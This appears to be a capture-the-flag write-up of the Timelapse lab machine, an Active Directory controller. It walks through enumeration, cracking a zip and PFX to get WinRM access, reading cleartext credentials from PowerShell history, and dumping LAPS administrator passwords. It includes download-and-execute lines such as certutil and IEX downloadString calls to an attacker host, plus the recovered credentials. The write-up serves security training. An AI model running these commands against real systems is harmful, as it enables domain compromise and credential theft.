Host entries
1
| 10.10.11.152 dc01.timelapse.htb timelapse.htb
|
If Active Directory => NTP Synchronization with the domain controller.
Content
- Kerberos enumeration
- RPC Enumeration
- SMB Enumeration
- NTP Enumeration
- Certificate & Private Key extracted from PFX
- Access with certificate & Private Key via winrm (evil-winrm)
- Powershell History hardcoded credentials
- Abusing of LAPS_Reader group to dump LAPS credentials.
Reconnaissance
Initial reconnaissance for TCP ports
1
2
3
4
| nmap -p- -sS --open --min-rate 5000 -Pn -n -vvv -oG allPorts 10.10.11.152
# Ports scanned: TCP(65535;1-65535) UDP(0;) SCTP(0;) PROTOCOLS(0;)
Host: 10.10.11.152 () Status: Up
Host: 10.10.11.152 () Ports: 53/open/tcp//domain///, 88/open/tcp//kerberos-sec///, 135/open/tcp//msrpc///, 139/open/tcp//netbios-ssn///, 389/open/tcp//ldap///, 445/open/tcp//microsoft-ds///, 464/open/tcp//kpasswd5///, 593/open/tcp//http-rpc-epmap///, 636/open/tcp//ldapssl///, 3268/open/tcp//globalcatLDAP///, 3269/open/tcp//globalcatLDAPssl///, 5986/open/tcp//wsmans///, 9389/open/tcp//adws///, 49667/open/tcp/////, 49673/open/tcp/////, 49674/open/tcp/////, 49692/open/tcp/////, 49700/open/tcp/////
|
Services and Versions running:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
| nmap -p53,88,135,139,389,445,464,593,636,3268,3269,5986,9389,49667,49673,49674,49692,49700 -sCV -Pn -n -vvv -oN targeted 10.10.11.152
Nmap scan report for 10.10.11.152
Host is up, received user-set (0.098s latency).
Scanned at 2023-02-06 18:48:02 GMT for 105s
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2023-02-07 02:48:08Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl? syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp open globalcatLDAPssl? syn-ack ttl 127
5986/tcp open ssl/http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Issuer: commonName=dc01.timelapse.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-10-25T14:05:29
| Not valid after: 2022-10-25T14:25:29
| MD5: e233a19945040859013fb9c5e4f691c3
| SHA-1: 5861acf776b8703fd01ee25dfc7c9952a4477652
| -----BEGIN CERTIFICATE-----
...
|_-----END CERTIFICATE-----
|_ssl-date: 2023-02-07T02:49:42+00:00; +7h59m59s from scanner time.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| tls-alpn:
|_ http/1.1
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49673/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49692/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49700/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 7h59m58s, deviation: 0s, median: 7h59m57s
| smb2-time:
| date: 2023-02-07T02:49:05
|_ start_date: N/A
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 26636/tcp): CLEAN (Timeout)
| Check 2 (port 32357/tcp): CLEAN (Timeout)
| Check 3 (port 39584/udp): CLEAN (Timeout)
| Check 4 (port 22941/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
|
UDP open ports:
1
2
3
4
5
6
| extractUDPPorts allUDPPorts
[*] Extracting information...
[*] IP Address: 10.10.11.152
[*] Open ports: 53,123
|
Kerberos enumeration throws no users valid:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
| kerbrute userenum -d timelapse.htb --dc 10.10.11.152 /usr/share/seclists/Kerberos/A-Z.Surnames.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (9cfb81e) - 02/06/23 - Ronnie Flathers @ropnop
2023/02/06 19:03:29 > Using KDC(s):
2023/02/06 19:03:29 > 10.10.11.152:88
2023/02/06 19:08:24 > Done! Tested 13000 usernames (0 valid) in 295.327 seconds
|
RPC Enumeration, only the SID of the Doman can be extracted (helpful for Silver Ticket Attack):
1
2
3
| rpcclient $> lsaquery
Domain Name: TIMELAPSE
Domain Sid: S-1-5-21-671920749-559770252-3318990721
|
Nothing interesting on Netbios (tcp-139) port:
1
2
3
4
5
| nbtscan -r 10.10.11.152
Doing NBT name scan for addresses from 10.10.11.152
IP address NetBIOS Name Server User MAC address
------------------------------------------------------------------------------
|
LDAP Enumeration with nmap (nothing interesting):
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
| nmap -sT -Pn -n --open 10.10.11.152 -p389 --script ldap-rootdse
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-06 19:38 GMT
Nmap scan report for 10.10.11.152
Host is up (0.37s latency).
PORT STATE SERVICE
389/tcp open ldap
| ldap-rootdse:
| LDAP Results
| <ROOT>
| domainFunctionality: 7
| forestFunctionality: 7
| domainControllerFunctionality: 7
| rootDomainNamingContext: DC=timelapse,DC=htb
| ldapServiceName: timelapse.htb:dc01$@TIMELAPSE.HTB
| isGlobalCatalogReady: TRUE
| supportedSASLMechanisms: GSSAPI
| supportedSASLMechanisms: GSS-SPNEGO
| supportedSASLMechanisms: EXTERNAL
| supportedSASLMechanisms: DIGEST-MD5
| supportedLDAPVersion: 3
| supportedLDAPVersion: 2
| supportedLDAPPolicies: MaxPoolThreads
| supportedLDAPPolicies: MaxPercentDirSyncRequests
| supportedLDAPPolicies: MaxDatagramRecv
| supportedLDAPPolicies: MaxReceiveBuffer
| supportedLDAPPolicies: InitRecvTimeout
| supportedLDAPPolicies: MaxConnections
| supportedLDAPPolicies: MaxConnIdleTime
| supportedLDAPPolicies: MaxPageSize
| supportedLDAPPolicies: MaxBatchReturnMessages
| supportedLDAPPolicies: MaxQueryDuration
| supportedLDAPPolicies: MaxDirSyncDuration
| supportedLDAPPolicies: MaxTempTableSize
| supportedLDAPPolicies: MaxResultSetSize
| supportedLDAPPolicies: MinResultSets
| supportedLDAPPolicies: MaxResultSetsPerConn
| supportedLDAPPolicies: MaxNotificationPerConn
| supportedLDAPPolicies: MaxValRange
| supportedLDAPPolicies: MaxValRangeTransitive
| supportedLDAPPolicies: ThreadMemoryLimit
| supportedLDAPPolicies: SystemMemoryLimitPercent
| supportedControl: 1.2.840.113556.1.4.319
| supportedControl: 1.2.840.113556.1.4.801
| supportedControl: 1.2.840.113556.1.4.473
| supportedControl: 1.2.840.113556.1.4.528
| supportedControl: 1.2.840.113556.1.4.417
| supportedControl: 1.2.840.113556.1.4.619
| supportedControl: 1.2.840.113556.1.4.841
| supportedControl: 1.2.840.113556.1.4.529
| supportedControl: 1.2.840.113556.1.4.805
| supportedControl: 1.2.840.113556.1.4.521
| supportedControl: 1.2.840.113556.1.4.970
| supportedControl: 1.2.840.113556.1.4.1338
| supportedControl: 1.2.840.113556.1.4.474
| supportedControl: 1.2.840.113556.1.4.1339
| supportedControl: 1.2.840.113556.1.4.1340
| supportedControl: 1.2.840.113556.1.4.1413
| supportedControl: 2.16.840.1.113730.3.4.9
| supportedControl: 2.16.840.1.113730.3.4.10
| supportedControl: 1.2.840.113556.1.4.1504
| supportedControl: 1.2.840.113556.1.4.1852
| supportedControl: 1.2.840.113556.1.4.802
| supportedControl: 1.2.840.113556.1.4.1907
| supportedControl: 1.2.840.113556.1.4.1948
| supportedControl: 1.2.840.113556.1.4.1974
| supportedControl: 1.2.840.113556.1.4.1341
| supportedControl: 1.2.840.113556.1.4.2026
| supportedControl: 1.2.840.113556.1.4.2064
| supportedControl: 1.2.840.113556.1.4.2065
| supportedControl: 1.2.840.113556.1.4.2066
| supportedControl: 1.2.840.113556.1.4.2090
| supportedControl: 1.2.840.113556.1.4.2205
| supportedControl: 1.2.840.113556.1.4.2204
| supportedControl: 1.2.840.113556.1.4.2206
| supportedControl: 1.2.840.113556.1.4.2211
| supportedControl: 1.2.840.113556.1.4.2239
| supportedControl: 1.2.840.113556.1.4.2255
| supportedControl: 1.2.840.113556.1.4.2256
| supportedControl: 1.2.840.113556.1.4.2309
| supportedControl: 1.2.840.113556.1.4.2330
| supportedControl: 1.2.840.113556.1.4.2354
| supportedCapabilities: 1.2.840.113556.1.4.800
| supportedCapabilities: 1.2.840.113556.1.4.1670
| supportedCapabilities: 1.2.840.113556.1.4.1791
| supportedCapabilities: 1.2.840.113556.1.4.1935
| supportedCapabilities: 1.2.840.113556.1.4.2080
| supportedCapabilities: 1.2.840.113556.1.4.2237
| subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=timelapse,DC=htb
| serverName: CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=timelapse,DC=htb
| schemaNamingContext: CN=Schema,CN=Configuration,DC=timelapse,DC=htb
| namingContexts: DC=timelapse,DC=htb
| namingContexts: CN=Configuration,DC=timelapse,DC=htb
| namingContexts: CN=Schema,CN=Configuration,DC=timelapse,DC=htb
| namingContexts: DC=DomainDnsZones,DC=timelapse,DC=htb
| namingContexts: DC=ForestDnsZones,DC=timelapse,DC=htb
| isSynchronized: TRUE
| highestCommittedUSN: 131176
| dsServiceName: CN=NTDS Settings,CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=timelapse,DC=htb
| dnsHostName: dc01.timelapse.htb
| defaultNamingContext: DC=timelapse,DC=htb
| currentTime: 20230207033838.0Z
|_ configurationNamingContext: CN=Configuration,DC=timelapse,DC=htb
Service Info: Host: DC01; OS: Windows
|
SMB Enumeration, following shares available:
1
2
3
4
5
6
7
8
9
10
11
12
| crackmapexec smb 10.10.11.152 -u 'guest' -p '' --shares
SMB 10.10.11.152 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.152 445 DC01 [+] timelapse.htb\guest:
SMB 10.10.11.152 445 DC01 [+] Enumerated shares
SMB 10.10.11.152 445 DC01 SharePermissions Remark
SMB 10.10.11.152 445 DC01 ---------------- ------
SMB 10.10.11.152 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.152 445 DC01 C$ Default share
SMB 10.10.11.152 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.152 445 DC01 NETLOGON Logon server share
SMB 10.10.11.152 445 DC01 Shares READ
SMB 10.10.11.152 445 DC01 SYSVOL Logon server share
|
Inside the Shares
share we are able to get some files:
1
2
3
4
5
6
7
8
9
| # Dev directory
smb: \Dev\> dir
winrm_backup.zip A 2611 Mon Oct 25 15:46:42 2021
# Help Desk directory
smb: \HelpDesk\> dir
LAPS.x64.msi A 1118208 Mon Oct 25 14:57:50 2021
LAPS_Datasheet.docx A 104422 Mon Oct 25 14:57:46 2021
LAPS_OperationsGuide.docx A 641378 Mon Oct 25 14:57:40 2021
LAPS_TechnicalSpecification.docx A 72683 Mon Oct 25 14:57:44
|
Exploitation
The .zip file is password protected, so we extract its hash with zip2john and then proceed to crack it with hashcat:
1
2
3
4
| zip2john winrm_backup.zip
ver 2.0 efh 5455 efh 7875 winrm_backup.zip/legacyy_dev_auth.pfx PKZIP Encr: TS_chk, cmplen=2405, decmplen=2555, crc=12EC5683 ts=72AA cs=72aa type=8
winrm_backup.zip/legacyy_dev_auth.pfx:$pkzip$1*1*2*0*965*9fb*12ec5683*0*4e*8*965*72aa*1a84b40ec6b5c20abd7d695aa16d8c88a3cec7243a...
40c7d3df38fc5da2c1a255ff8c9e344761a397d2c2d59d722723d27140c6830563ee783156404a17e2f7b7e506452f76*$/pkzip$:legacyy_dev_auth.pfx:winrm_backup.zip::winrm_backup.zip
|
Hashcat output:
1
2
| D:\Programs\hashcat-6.2.5>hashcat.exe -m 17220 -a 0 hash.txt rockyou.txt
supremelegacy
|
The .pfx file is also password protected:
1
2
3
| pfx2john legacyy_dev_auth.pfx
legacyy_dev_auth.pfx:$pfxng$1$20$2000$20$eb755568327396de179c4a5...
45b03465a6ce0c974055e6dcc74f0e893:::::legacyy_dev_auth.pfx
|
Let’s decrypt it with john
:
1
2
3
4
| pfx2john legacyy_dev_auth.pfx | john /dev/stdin --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Press Ctrl-C to abort, or send SIGUSR1 to john process for status
thuglegacy (legacyy_dev_auth.pfx)
|
Now that we get the passphrase for the PFX certificate, we need to extract its content. Searching on the Internet, we find this guide How to Extract Certificate and Private Key from PFX basically we need to run two commands:
1
2
3
4
5
| # Extract the public certificate
openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out publicCert.pem
# Extract the private key (don't forget to use the .pfx passphrase)
openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out priv-key.pem -nodes
Enter Import Password:
|
Now that we get this two files, we can proceed to access the machine:
1
| evil-winrm -i 10.10.11.152 -c publicCert.pem -k priv-key.pem -S
|
Privilege Escalation
It was not possible to upload SharpHound.exe nor SharpHound.ps1
1
2
3
4
5
| *Evil-WinRM* PS C:\WIndows\Temp\PrivEsc> certutil -urlcache -f http://10.10.14.3/SharpHound.exe SharpHound.exe
At line:1 char:1
+ certutil -urlcache -f http://10.10.14.3/SharpHound.exe SharpHound.exe
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
|
First step is to enumerate manually our user:
1
2
3
4
5
6
7
8
9
10
| *Evil-WinRM* PS C:\WIndows\Temp\PrivEsc> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
|
No special privileges that could lead to a PrivEsc, it is not possible to run wmic either:
1
2
3
4
5
6
| *Evil-WinRM* PS C:\WIndows\Temp\PrivEsc> wmic process list brief
WMIC.exe : ERROR:
Description = Access denied
*Evil-WinRM* PS C:\WIndows\Temp\PrivEsc> wmic computersystem list
WMIC.exe : ERROR:
Description = Access denied
|
A good technique for privilege escalation on Windows is to read the Powershell History located in the PATH:
1
| C:\Users\<Username>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
|
In this case, we found some credentials in clear text on the history:
1
2
3
4
5
6
7
8
9
10
11
| *Evil-WinRM* PS C:\Users\legacyy> type AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -
SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit
|
We can use this credentials to access to the machine as the user svc_deploy:
1
2
| evil-winrm -i 10.10.11.152 -u 'svc_deploy' -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S
*Evil-WinRM* PS C:\Users\svc_deploy\Documents>
|
Now is time to enumerate this user’s permissions:
1
2
3
4
5
6
7
8
9
10
| *Evil-WinRM* PS C:\Uwhoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
|
No special permissions, let’s enumerate our groups:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
| *Evil-WinRM* PS C:\Users\svc_deploy\Documents> net user svc_deploy
User name svc_deploy
Full Name svc_deploy
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 10/25/2021 11:12:37 AM
Password expires Never
Password changeable 10/26/2021 11:12:37 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 2/6/2023 9:25:55 PM
Logon hours allowed All
Local Group Memberships *Remote Management Use
Global Group memberships *LAPS_Readers *Domain Users
The command completed successfully.
|
Now this is interesting, we are part of a group called “LAPS_Readers”; a good search about that group could lead us to something interesting, a good article about Dumping LAPS such article give us a reference to the Get-LAPSPasswords.ps1 which is worth to check:
1
| IEX(New-Object Net.WebClient).downloadString('http://10.10.14.3/Get-LAPSPasswords.ps1')
|
Then by reading the exploit, we find that the Powershell module can be executed as follows:
1
2
3
4
5
| Hostname : dc01.timelapse.htb
Stored : 1
Readable : 1
Password : d2s(09pQNZ.}Q.db5,m-drS2
Expiration : 2/11/2023 6:35:44 PM
|
Post Exploitation
Another technique to retrieve LAPS passwords is by using the Laps.py:
1
2
3
| python3 laps.py -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -d timelapse.htb
LAPS Dumper - Running at 06-02-2023 04:44:09
DC01 d2s(09pQNZ.}Q.db5,m-drS2
|
Credentials
1
2
3
4
5
6
7
8
| # winrm_backup.zip password
supremelegacy
# legacyy_dev_auth.pfx
thuglegacy
# Credentials for user svc_deploy
svc_deploy:E3R$Q62^12p7PLlC%KWaxuaV
# Credentials for administrator
administrator:d2s(09pQNZ.}Q.db5,m-drS2
|
Notes
- Evil-winrm can be used to authenticate with certificates, also is worth noting that if we want to authenticate via SSL we need to add the (-S) flag
- Always lookup for hardcoded passwords on files specially on powershell history.
- To check if we have read access to an SMB share we need to use the
--shares
with crackmapexec or to use SMBMAP not only with SMBClient to be sure.
References